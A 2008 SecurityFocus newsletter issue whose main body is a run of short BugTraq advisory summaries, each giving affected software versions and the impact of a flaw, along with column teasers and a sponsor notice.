WINDOWS CENTER: SecurityFocus Newsletter #453

SecurityFocus Newsletter #453
----------------------------------------

This issue is sponsored by Solidcore Systems Inc.

PCI DSS Compliance for $50/Node
The QSA's choice for low-cost automation of 30 PCI DSS controls on servers, databases, and network devices.
Watch the Demo now! http://www.solidcore.com/landing_pages/PCI_Tour_sf.html

SECURITY BLOGS
SecurityFocus has selected a few syndicated sources that stand out as conveying topics of interest for our community. We are proud to offer content from Matasano at this time and will be adding more in the coming weeks.
http://www.securityfocus.com/blogs

------------------------------------------------------------------
I. FRONT AND CENTER
1. Click Crime
2. Just Who's Being Exploited?
II. BUGTRAQ SUMMARY
1. Debian OpenSSL Package Random Number Generator Weakness
2. CDF (Common Data Format) Library 'src/lib/cdfread64.c' Stack Based Buffer Overflow Vulnerability
3. Audacity Insecure Temporary File Creation Vulnerability
4. CUPS PNG Filter Multiple Integer Overflow Vulnerabilities
5. Libpng Library Unknown Chunk Handler Vulnerability
6. Mozilla Thunderbird/Seamonkey/Firefox 2.0.0.12 Multiple Remote Vulnerabilities
7. PHP 5.2.5 and Prior Versions Multiple Vulnerabilities
8. Sun Solaris Print Service Unspecified Remote Code Execution Vulnerability
9. PHP 5.2.3 and Prior Versions Multiple Vulnerabilities
10. PHP Glob() Function Arbitrary Code Execution Vulnerability
11. Perl Unicode '\Q...\E' Quoting Construct Regular Expression Buffer Overflow Vulnerability
12. rdesktop Multiple Remote Memory Corruption Vulnerabilities
13. TCL/TK Tk Toolkit 'ReadImage()' GIF File Buffer Overflow Vulnerability
14. Microsoft Windows CE JPEG And GIF Processing Multiple Arbitrary Code Execution Vulnerabilities
15. PHP 5 'php_sprintf_appendstring()' Remote Integer Overflow Vulnerability
16. Bugzilla Security Bypass and Cross Site Scripting Vulnerabilities
17. Nagios Unspecified Cross-Site Scripting Vulnerability
18. MoinMoin Multiple ACL Security Bypass Vulnerabilities
19. OpenOffice Multiple Heap Based Buffer Overflow Vulnerabilities
20. KDE 'start_kdeinit' Multiple Local Privilege Escalation Vulnerabilities
21. Rsync 'xattr' Support Integer Overflow Vulnerability
22. Poppler and Xpdf PDF Rendering Library Embedded Font Remote Code Execution Vulnerability
23. bzip2 Unspecified File Handling Vulnerability
24. KDE KHTML PNGLoader Heap Buffer Overflow Vulnerability
25. Mozilla Firefox/SeaMonkey JavaScript Garbage Collector Memory Corruption Vulnerability
26. Squid Web Proxy Cache 'arrayShrink()' Remote Denial of Service Vulnerability
27. Microsoft Word CSS Handling Memory Corruption Remote Code Execution Vulnerability
28. Mega File Hosting Script 'members.php' SQL Injection Vulnerability
29. PhpMyAgenda 'infoevent.php3' Remote File Include Vulnerability
30. Microsoft Word RTF Malformed String Handling Memory Corruption Remote Code Execution Vulnerability
31. QEMU 'vl.c' Security Bypass Vulnerability
32. QEMU Multiple Local Vulnerabilities
33. Xen 'xenmon.py' and 'xenbaked' Insecure Temporary File Creation Vulnerability
34. Microsoft Windows Intelligent Input/Output (I2O) Multiple Local Privilege Escalation Vulnerabilities
35. Microsoft Jet DataBase Engine MDB File Parsing Remote Buffer Overflow Vulnerability
36. Microsoft Publisher Memory Object Handler Data Remote Code Execution Vulnerability
37. CMS Made Simple 'modules/FileManager/postlet/javaUpload.php' Arbitrary File Upload Vulnerability
38. Microsoft Malware Protection Engine Disk Space Exhaustion Remote Denial Of Service Vulnerability
39. Microsoft Malware Protection Engine File Processing Remote Denial Of Service Vulnerability
40. Fusebox 'fusebox5.php' Remote File Include Vulnerability
41. Editorial 'admin/index.php3' SQL Injection Vulnerability
42. HP FTP Unspecified Remote Denial of Service Vulnerability
43. Claroline Multiple Remote File Include Vulnerabilities
44. Cisco User-Changeable Password (UCP) 'CSuserCGI.exe' Multiple Remote Vulnerabilities
45. BIGACE 'GLOBALS[_BIGACE][DIR]' Parameter Multiple Remote File Include Vulnerabilities
46. IBD Micro CMS 'microcms-admin-login.php' Multiple SQL Injection Vulnerabilities
47. ClanLite SQL Injection and Cross-Site Scripting Vulnerabilities
48. AJ Dating 'view_profile.php' SQL Injection Vulnerability
49. OpenSSL Montgomery Exponentiation Side-Channel Local Information Disclosure Vulnerability
50. OpenSSL DTLS Heap Buffer Overflow Vulnerability
51. CyrixMED 'index.php' Cross Site Scripting Vulnerability
52. Linux Kernel 'fcntl_setlk()' SMP Ordering Local Denial of Service Vulnerability
53. T1lib intT1_Env_GetCompletePath Buffer Overflow Vulnerability
54. teTeX Mkind.C Remote Buffer Overflow Vulnerability
55. teTeX DVI File Parsing Multiple Vulnerabilities
56. GD Graphics Library Multiple Vulnerabilities
57. Xpdf Multiple Remote Stream.CC Vulnerabilities
58. KDE KPDF/KWord/XPDF StreamPredictor Function Stack Buffer Overflow Vulnerability
59. GD Graphics Library PNG File Processing Denial of Service Vulnerability
60. PCRE Regular Expression Library UTF-8 Options Multiple Remote Denial of Service Vulnerabilities
61. Meto Forum 'forum/kategori.asp' SQL Injection Vulnerability
62. WGCC Web Group Communication Center Cross-Site Scripting and SQL Injection Vulnerabilities
63. Build A Niche Store 'q' Parameter Cross-Site Scripting Vulnerability
64. Xen Para-Virtualized Framebuffer Message Format Denial Of Service Vulnerability
65. Zogo-shop 'products.php' SQL Injection Vulnerability
66. EQdkp 'user_id' Parameter SQL Injection Vulnerability
67. Xen Para Virtualized Frame Buffer Backend Local Denial of Service Vulnerability
68. TYPO3 WT Gallery Extension Multiple Input Validation Vulnerabilities
69. e107 BLOG Engine 'comment.php' SQL Injection Vulnerability
70. TYPO3 Event Database Extension Unspecified Cross Site Scripting Vulnerability
71. ActualScripts ActualAnalyzer 'view.php' Cross-Site Scripting Vulnerability
72. PCRE Regular Expression Library Multiple Integer and Buffer Overflow Vulnerabilities
73. PCRE Regular Expression Library Multiple Security Vulnerabilities
74. Apache HTTP Server 403 Error Cross-Site Scripting Vulnerability
75. ZeusCart 'category_list.php' SQL Injection Vulnerability
76. phpInstantGallery Multiple Cross-Site Scripting Vulnerabilities
77. Joomla! and Mambo xsstream-dm Component 'movie' Parameter SQL Injection Vulnerability
78. AJ Classifieds 'index.php' SQL Injection Vulnerability
79. AJ Auction 'classifide_ad.php' SQL Injection Vulnerability
80. AJ Article 'featured_article.php' SQL Injection Vulnerability
81. Blender 'radiance_hdr.c' Remote Buffer Overflow Vulnerability
82. Blender Unspecified Insecure Temporary File Creation Vulnerability
83. WordPress WP Photo Album Plugin 'photo' Parameter SQL Injection Vulnerability
84. Vortex CMS 'index.php' SQL Injection Vulnerability
85. QuickUpCMS Multiple SQL Injection Vulnerabilities
86. PhpBlock Multiple Remote File Include Vulnerabilities
87. OtherLogic 'vocourse.php' SQL Injection Vulnerability
88. Advanced Links Management 'read.php' SQL Injection Vulnerability
89. SARG Multiple Unspecified Buffer Overflow Vulnerabilities
90. Joomla! and Mambo Datsogallery Component 'sub_votepic.php' SQL Injection Vulnerability
91. Linux Kernel 'sys_utimensat' Local Denial of Service Vulnerability
92. BlogPHP Multiple HTML Injection, Cross-Site Scripting and Cookie Manipulation Vulnerabilities
93. Phoenix View CMS 'admin_frame.php' Cross-Site Scripting Vulnerability
94. Ktools PhotoStore Multiple SQL Injection Vulnerabilities
95. Ktools PhotoStore 'gallery.php' SQL Injection Vulnerability
96. txtCMS 'index.php' Local File Include Vulnerability
97. Admidio 'get_file.php' Local File Include Vulnerability
98. Red Hat Directory Server LDAP Query Patterns Buffer Overflow Vulnerability
99. ZoneMinder Multiple Unspecified Remote Code Execution Vulnerabilities
100. SIPp 'call.cpp' Remote Buffer Overflow Vulnerability
III. SECURITYFOCUS NEWS
1. Groups warn travelers to limit laptop data
2. Patches pose significant risk, researchers say
3. U.S. gov't pushes cybersecurity at con
4. Web developers, fix thy Flash
IV. SECURITY JOBS LIST SUMMARY
1. [SJ-JOB] Quality Assurance, Alpharetta
2. [SJ-JOB] Security Researcher, Centreville, VA
3. [SJ-JOB] Forensics Engineer, Arlington
4. [SJ-JOB] Sr. Product Manager, San Jose
5. [SJ-JOB] Application Security Engineer, New York
6. [SJ-JOB] Security Auditor, South Portland
7. [SJ-JOB] Application Security Engineer, Philadelphia
8. [SJ-JOB] Sales Representative, San Jose
9. [SJ-JOB] Security Architect, South Portland
10. [SJ-JOB] Security Consultant, Mission Viejo
11. [SJ-JOB] Security Consultant, Dallas
12. [SJ-JOB] Security Consultant, Chicago
13. [SJ-JOB] Security Consultant, Various
14. [SJ-JOB] Forensics Engineer, Mission Viejo
15. [SJ-JOB] Security Consultant, Calgary
V. INCIDENTS LIST SUMMARY
1. Distributed Bruteforce against SSH
2. Possible Zombie/Bot?
3. Malware IRC/DNS Network Activity
4. Weird SSH attack last night and this morning (still ongoing)
VI. VULN-DEV RESEARCH LIST SUMMARY
VII. MICROSOFT FOCUS LIST SUMMARY
1. XP Hardening
2. SecurityFocus Microsoft Newsletter #393
3. Binding Windows Services to Specific Addresses Only
VIII. SUN FOCUS LIST SUMMARY
IX. LINUX FOCUS LIST SUMMARY
X. UNSUBSCRIBE INSTRUCTIONS
XI. SPONSOR INFORMATION

I. FRONT AND CENTER
---------------------
1. Click Crime
By Mark Rasch
It has long been a crime not only to commit an illegal act, but also to attempt -- or conspire with others -- to commit one.

http://www.securityfocus.com/columnists/471

2.Just Who's Being Exploited?
By Jamie Reid
Last month's revelation that Tipping Point paid out a prize of $10,000 and a new laptop (MSRP: about $2000) at the CanSecWest conference, for the privilege of being the exclusive licensor of a heretofore unpublished vulnerability in Apple's Safari web browser to researcher, Charles Miller of Independent Security Evaluators, may lend some credence to this adage.
http://www.securityfocus.com/columnists/470

II. BUGTRAQ SUMMARY
--------------------
1. Debian OpenSSL Package Random Number Generator Weakness
BugTraq ID: 29179
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29179
Summary:
The Debian OpenSSL package is prone to a random-number-generator weakness.

Attackers can exploit this issue to predict random data used to generate encryption keys by certain applications. This may help attackers compromise encryption keys and gain access to sensitive data.

This issue affects only a modified OpenSSL package for Debian prior to version 0.9.8c-4etch3.

2. CDF (Common Data Format) Library 'src/lib/cdfread64.c' Stack Based Buffer Overflow Vulnerability
BugTraq ID: 29045
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29045
Summary:
The CDF (Common Data Format) library is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data when processing CDF files.

Attackers can exploit this issue by enticing unsuspecting users to open malicious files. Successful exploits will allow code to run with the privileges of the user. Failed attacks will cause denial-of-service conditions.

CDF 3.2 and prior versions are vulnerable.

3. Audacity Insecure Temporary File Creation Vulnerability
BugTraq ID: 26608
Remote: No
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/26608
Summary:
Audacity is prone to a security vulnerability because it creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to perform symlink attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.

This issue affects Audacity 1.3.2; other versions may also be vulnerable.

4. CUPS PNG Filter Multiple Integer Overflow Vulnerabilities
BugTraq ID: 28781
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28781
Summary:
CUPS is prone to multiple integer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied PNG image sizes before using them to allocate memory buffers.

Successful exploits may allow attackers to execute arbitrary code with the privileges of a user running the utilities. Failed exploit attempts likely cause denial-of-service conditions.

CUPS 1.3.7 is vulnerable; other versions may also be affected.

5. Libpng Library Unknown Chunk Handler Vulnerability
BugTraq ID: 28770
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28770
Summary:
The 'libpng' library is prone to a vulnerability that causes denial-of-service conditions or may allow code to run. The issue occurs because the software fails to properly handle unexpected chunk data in PNG files.

Successfully exploiting this issue allows remote attackers to trigger denial-of-service conditions or to possibly execute arbitrary machine code in the context of applications that use the library.

The following versions are affected:

libpng 1.0.6 through 1.0.32
libpng 1.2.0 through 1.2.26
libpng 1.4.0beta01 through 1.4.0beta19

6. Mozilla Thunderbird/Seamonkey/Firefox 2.0.0.12 Multiple Remote Vulnerabilities
BugTraq ID: 28448
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28448
Summary:
The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox 2.0.0.12 and prior versions.

Exploiting these issues can allow attackers to:

- steal authentication credentials
- obtain potentially sensitive information
- violate the same-origin policy
- execute scripts with elevated privileges
- cause denial-of-service conditions
- potentially execute arbitrary code
- perform cross-site request-forgery attacks

Other attacks are possible.

These issues are present in Firefox 2.0.0.12 and prior versions. Many of these issues are present in Mozilla Thunderbird 2.0.0.12 and prior versions as well as SeaMonkey 1.1.8 and prior versions.

UPDATE: Versions of Mozilla Thunderbird prior to 2.0.0.14 are affected by issues described in MFSA 2008-14 and MFSA 2008-15.

7. PHP 5.2.5 and Prior Versions Multiple Vulnerabilities
BugTraq ID: 29009
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29009
Summary:
PHP 5.2.5 and prior versions are prone to multiple security vulnerabilities.

Successful exploits could allow an attacker to bypass security restrictions, cause a denial-of-service condition, and potentially execute code.

These issues are reported to affect PHP 5.2.5 and prior versions.

8. Sun Solaris Print Service Unspecified Remote Code Execution Vulnerability
BugTraq ID: 29135
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29135
Summary:
Sun Solaris Print Service is prone to an unspecified remote code-execution vulnerability.

This issue allows remote attackers to execute arbitrary machine code with SYSTEM-level privileges on affected computers. Failed exploit attempts will result in denial-of-service conditions.

No further technical details are currently available. We will update this BID as more information emerges.

9. PHP 5.2.3 and Prior Versions Multiple Vulnerabilities
BugTraq ID: 25498
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/25498
Summary:
PHP 5.2.3 and prior versions are prone to multiple security vulnerabilities. Successful exploits could allow an attacker to bypass security restrictions, cause a denial-of-service condition, and potentially execute code.

10. PHP Glob() Function Arbitrary Code Execution Vulnerability
BugTraq ID: 24922
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/24922
Summary:
PHP is prone to a vulnerability that lets attackers execute arbitrary code.

An attacker can exploit this issue to execute arbitrary machine code in the context of the affected application or to cause denial-of-service conditions.

This issue affects PHP 5.2.3 and 4.4.4. Other versions may also be affected.

11. Perl Unicode '\Q...\E' Quoting Construct Regular Expression Buffer Overflow Vulnerability
BugTraq ID: 28928
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28928
Summary:
Perl is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input.

Successfully exploiting this issue may allow attackers to execute arbitrary machine code in the context of Perl applications using regular expressions in a vulnerable manner. This facilitates the remote compromise of affected computers. Failed exploits can cause denial-of-service conditions.

Perl 5.8.8 is vulnerable to this issue; other versions may also be affected.

NOTE: This issue may be related to BID 26350 ('Perl Unicode Regular Expression Buffer Overflow Vulnerability').

12. rdesktop Multiple Remote Memory Corruption Vulnerabilities
BugTraq ID: 29097
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29097
Summary:
The 'rdesktop' program is prone to multiple remote memory-corruption vulnerabilities because it fails to properly validate incoming packets.

A remote attacker can exploit these issues to execute arbitrary code in the context of the currently logged-in user.

These issues affect rdesktop 1.5.0; other versions may also be vulnerable.

13. TCL/TK Tk Toolkit 'ReadImage()' GIF File Buffer Overflow Vulnerability
BugTraq ID: 27655
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/27655
Summary:
TCL/TK Tk Toolkit is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied GIF image data before copying it to an insufficiently sized buffer.

Successful exploits may allow attackers to execute arbitrary code in the context of applications that use the affected toolkit. Failed exploit attempts likely result in denial-of-service conditions.

Versions prior to TCL/TK 8.5.1 are vulnerable to this issue.

14. Microsoft Windows CE JPEG And GIF Processing Multiple Arbitrary Code Execution Vulnerabilities
BugTraq ID: 29147
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29147
Summary:
Microsoft Windows CE is prone to multiple vulnerabilities that allow attackers to execute arbitrary code. The issues stem from unspecified errors.

An attacker can exploit these issues to execute arbitrary code within the context of the affected components. Failed exploit attempts will likely result in denial-of-service conditions.

15. PHP 5 'php_sprintf_appendstring()' Remote Integer Overflow Vulnerability
BugTraq ID: 28392
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28392
Summary:
PHP 5 is prone to an integer-overflow vulnerability because the software fails to ensure that integer values are not overrun.

Successful exploits of this vulnerability allow remote attackers to execute arbitrary machine code in the context of a webserver affected by the issue. Failed attempts will likely result in denial-of-service conditions.

PHP 5.2.5 and prior versions are vulnerable.

16. Bugzilla Security Bypass and Cross Site Scripting Vulnerabilities
BugTraq ID: 29038
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29038
Summary:
Bugzilla is prone to a security-bypass and a cross-site scripting vulnerability because it fails to properly validate user credentials and sanitize user-supplied input.

An attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.

The attacker may leverage the security-bypass issue to modify the status of bugs, despite the attacker's insufficient privileges.

Bugzilla 2.17.2 and 3.1.3 are vulnerable; other versions may also be affected.

17. Nagios Unspecified Cross-Site Scripting Vulnerability
BugTraq ID: 29140
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/29140
Summary:
Nagios is prone to an unspecified cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

18. MoinMoin Multiple ACL Security Bypass Vulnerabilities
BugTraq ID: 28869
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28869
Summary:
MoinMoin is prone to multiple security-bypass vulnerabilities because it fails to properly handle Access Control List (ACL) entries.

Successful exploits will allow attackers to bypass certain security restrictions and gain unauthorized access to administrative functionality. This in turn may lead to a compromise of the affected application.

Versions prior to MoinMoin 1.6.3 are affected.

19. OpenOffice Multiple Heap Based Buffer Overflow Vulnerabilities
BugTraq ID: 28819
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28819
Summary:
OpenOffice is prone to multiple remote heap-based buffer-overflow vulnerabilities because of errors in processing certain files.

Remote attackers can exploit these issues by enticing victims into opening maliciously crafted ODF, Quattro Pro, EMF, or OLE files.

Successful exploits may allow attackers to execute arbitrary code within the context of the affected application. Failed exploit attempts will likely result in a denial of service.

The issues affect OpenOffice 2 prior to 2.4. The OLE and EMF file issues also affect OpenOffice 1.1.

20. KDE 'start_kdeinit' Multiple Local Privilege Escalation Vulnerabilities
BugTraq ID: 28938
Remote: No
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28938
Summary:
The 'start_kdeinit' utility in KDE is prone to multiple local privilege-escalation vulnerabilities because it fails to properly sanitize input.

Successful attacks allow local users to send signals to arbitrary processes, triggering denial-of-service conditions. Attackers may also be able to execute arbitrary code with elevated privileges, facilitating the complete compromise of affected computers.

21. Rsync 'xattr' Support Integer Overflow Vulnerability
BugTraq ID: 28726
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28726
Summary:
The rsync utility is prone to a remote integer-overflow vulnerability because the application fails to properly ensure that user-supplied input doesn't overflow integer values. This may result in user-supplied data being copied past the end of a memory buffer.

Attackers may exploit this issue to execute arbitrary machine code in the context of the affected application, facilitating in the compromise of affected computers.

Versions of rsync between 2.6.9 and 3.0.1 that have 'xattr' support enabled are vulnerable.

22. Poppler and Xpdf PDF Rendering Library Embedded Font Remote Code Execution Vulnerability
BugTraq ID: 28830
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28830
Summary:
The Poppler and Xpdf PDF rendering library is prone to a remote code-execution vulnerability because the software fails to properly validate user-supplied data.

Successfully exploiting this issue allows attackers to execute arbitrary machine code in the context of applications that use the library. Failed exploit attempts likely result in denial-of-service conditions.

23. bzip2 Unspecified File Handling Vulnerability
BugTraq ID: 28286
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28286
Summary:
The 'bzip2' application is prone to a remote file-handling vulnerability because the application fails to properly handle malformed files.

Successful exploits may allow remote code to run, but this has not been confirmed. Exploit attempts will likely crash the application.

This issue affects bzip2 1.0.4; prior versions may also be affected.

24. KDE KHTML PNGLoader Heap Buffer Overflow Vulnerability
BugTraq ID: 28937
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28937
Summary:
KDE KHTML is prone to a remote buffer-overflow vulnerability because it fails to perform adequate bounds checking for user-supplied input while processing malicious PNG files.

Successful exploits allow remote attackers to execute arbitrary machine code in the context of applications that use KHTML. Failed exploit attempts will likely crash applications.

Versions included with KDE from KHTML 4.0 to 4.0.3 are affected by this issue. Since KHTML is included in other third-party packages, they may also be affected, but this has not been confirmed.

25. Mozilla Firefox/SeaMonkey JavaScript Garbage Collector Memory Corruption Vulnerability
BugTraq ID: 28818
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28818
Summary:
The Mozilla Foundation has released a security advisory disclosing a memory-corruption vulnerability that affects Mozilla Firefox, SeaMonkey, and potentially Thunderbird.

The vulnerability stems from an unspecified error in the JavaScript garbage collector.

Attackers may exploit this issue to crash a vulnerable application or potentially execute arbitrary code in the context of the application.

The issue affects Mozilla Firefox 2.0.0.13 and Mozilla SeaMonkey 1.1.9. Note that Mozilla Thunderbird shares the browser engine with Firefox and may also be vulnerable when JavaScript is enabled in emails.

26. Squid Web Proxy Cache 'arrayShrink()' Remote Denial of Service Vulnerability
BugTraq ID: 28693
Remote: Yes
Last Updated: 2008-05-12
Relevant URL: http://www.securityfocus.com/bid/28693
Summary:
Squid is prone to a remote denial-of-service vulnerability because of a flaw when processing HTTP headers for cached objects.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying further service to legitimate users.

NOTE: This vulnerability was caused by an incorrect fix for the issue described in BID 26687 (Squid Proxy Cache Update Reply Processing Remote Denial of Service Vulnerability; CVE-2007-6239).

This issue affects Squid 2.6 prior to 2.6.STABLE18.

27. Microsoft Word CSS Handling Memory Corruption Remote Code Execution Vulnerability
BugTraq ID: 29105
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29105
Summary:
Microsoft Word is prone to a remote code-execution vulnerability.

An attacker could exploit this issue by enticing a victim to open a malicious Word file.

Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.

28. Mega File Hosting Script 'members.php' SQL Injection Vulnerability
BugTraq ID: 29167
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29167
Summary:
Mega File Hosting Script is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mega File Hosting Script 1.2 is vulnerable; other versions may also be affected.

29. PhpMyAgenda 'infoevent.php3' Remote File Include Vulnerability
BugTraq ID: 29164
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29164
Summary:
PhpMyAgenda is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.

PhpMyAgenda 2.1 is vulnerable; other versions may also be affected.

30. Microsoft Word RTF Malformed String Handling Memory Corruption Remote Code Execution Vulnerability
BugTraq ID: 29104
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29104
Summary:
Microsoft Word is prone to a remote code-execution vulnerability.

An attacker could exploit this issue by enticing a victim to open a malicious RTF file.

Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.

31. QEMU 'vl.c' Security Bypass Vulnerability
BugTraq ID: 29101
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29101
Summary:
QEMU is prone to a security-bypass vulnerability because the application fails to properly restrict access to certain functionality.

Attackers in a guest system can exploit this issue to bypass certain security restrictions and carry out some unauthorized tasks. This may lead to various attacks.

This issue affects QEMU 0.9.1; other versions may also be vulnerable.

32. QEMU Multiple Local Vulnerabilities
BugTraq ID: 23731
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/23731
Summary:
QEMU is prone to multiple locally exploitable buffer-overflow and denial-of-service vulnerabilities. The buffer-overflow issues occur because the software fails to properly check boundaries of user-supplied input when copying it to insufficiently sized memory buffers. The denial-of-service issues stem from design errors.

Attackers may be able to exploit these issues to escalate privileges, execute arbitrary code, or trigger denial-of-service conditions in the context of the affected applications.

33. Xen 'xenmon.py' and 'xenbaked' Insecure Temporary File Creation Vulnerability
BugTraq ID: 26190
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/26190
Summary:
Xen is prone to a security vulnerability because it creates temporary files in an insecure manner.

An attacker with local access could potentially exploit this issue to perform symlink attacks, overwriting arbitrary files in the context of the affected application.

Successfully mounting a symlink attack may allow the attacker to overwrite or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.

This issue affects Xen 3.0; other versions may also be vulnerable.

34. Microsoft Windows Intelligent Input/Output (I2O) Multiple Local Privilege Escalation Vulnerabilities
BugTraq ID: 29171
Remote: No
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29171
Summary:
Microsoft Windows is prone to multiple local privilege-escalation vulnerabilities.

An attacker can exploit these issues to execute arbitrary code with kernel-level privileges. Successfully exploiting these issues will completely compromise affected computers.

These issues affect Windows XP prior to SP3.

35. Microsoft Jet DataBase Engine MDB File Parsing Remote Buffer Overflow Vulnerability
BugTraq ID: 26468
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/26468
Summary:
Microsoft Jet DataBase Engine is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data.

Remote attackers can exploit this issue to execute arbitrary machine code in the context of a user running the application. Successful exploits will compromise the affected application and possibly the underlying computer. Failed attacks will likely cause denial-of-service conditions.

NOTE: Further details report that attackers are using malicious Word files to load specially crafted MDB files. Microsoft has released a knowledge base article (950627) documenting this attack vector.

This issue does not affect Windows Server 2003 Service Pack 2, Windows XP Service Pack 3, Windows XP x64 edition Server Pack 2, Windows Vista, Windows Vista Service Pack 1 and Windows Server 2008 because they run a version of the Jet Database Engine that isn't vulnerable.

This issue does affect the Jet Database Engine, Microsoft Word 2000 Service Pack 3, Microsoft Word 2002 Service Pack 3, Microsoft Word 2003 Service Pack 2, Microsoft Word 2003 Service Pack 3, Microsoft Word 2007, and Microsoft Word 2007 Service Pack 1 on Microsoft Windows 2000, Windows XP, or Windows Server 2003 Service Pack 1.

36. Microsoft Publisher Memory Object Handler Data Remote Code Execution Vulnerability
BugTraq ID: 29158
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29158
Summary:
Microsoft Publisher is prone to a remote code-execution vulnerability.

An attacker could exploit this issue by enticing a victim to open a malicious Publisher file.

Successfully exploiting this issue would allow the attacker to execute arbitrary code in the context of the currently logged-in user.

37. CMS Made Simple 'modules/FileManager/postlet/javaUpload.php' Arbitrary File Upload Vulnerability
BugTraq ID: 29170
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29170
Summary:
CMS Made Simple is prone to a vulnerability that lets remote attackers upload and execute arbitrary script code because the application fails to properly validate the content of files being uploaded.

An attacker can leverage this issue to execute arbitrary code on an affected computer with the privileges of the webserver process.

CMS Made Simple 1.2.4 is vulnerable; other versions may also be affected.

38. Microsoft Malware Protection Engine Disk Space Exhaustion Remote Denial Of Service Vulnerability
BugTraq ID: 29073
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29073
Summary:
Microsoft Malware Protection Engine is prone to a remote denial-of-service vulnerability because it fails to properly validate certain data structures when parsing specially crafted files.

Attackers can exploit this issue to cause an affected computer to stop responding or to restart. Successful attacks will deny service to legitimate users.

39. Microsoft Malware Protection Engine File Processing Remote Denial Of Service Vulnerability
BugTraq ID: 29060
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29060
Summary:
Microsoft Malware Protection Engine is prone to a remote denial-of-service vulnerability because it fails to properly validate user-supplied input when parsing specially crafted files.

Attackers can exploit this issue to cause an affected computer to stop responding or to restart. Successful attacks will deny service to legitimate users.

40. Fusebox 'fusebox5.php' Remote File Include Vulnerability
BugTraq ID: 29163
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29163
Summary:
Fusebox is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

Exploiting this issue can allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Fusebox 5.5.1 is vulnerable; other versions may also be affected.

41. Editorial 'admin/index.php3' SQL Injection Vulnerability
BugTraq ID: 29161
Remote: Yes
Last Updated: 2008-05-13
Relevant URL: http://www.securityfocus.com/bid/29161
Summary:
Editorial is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

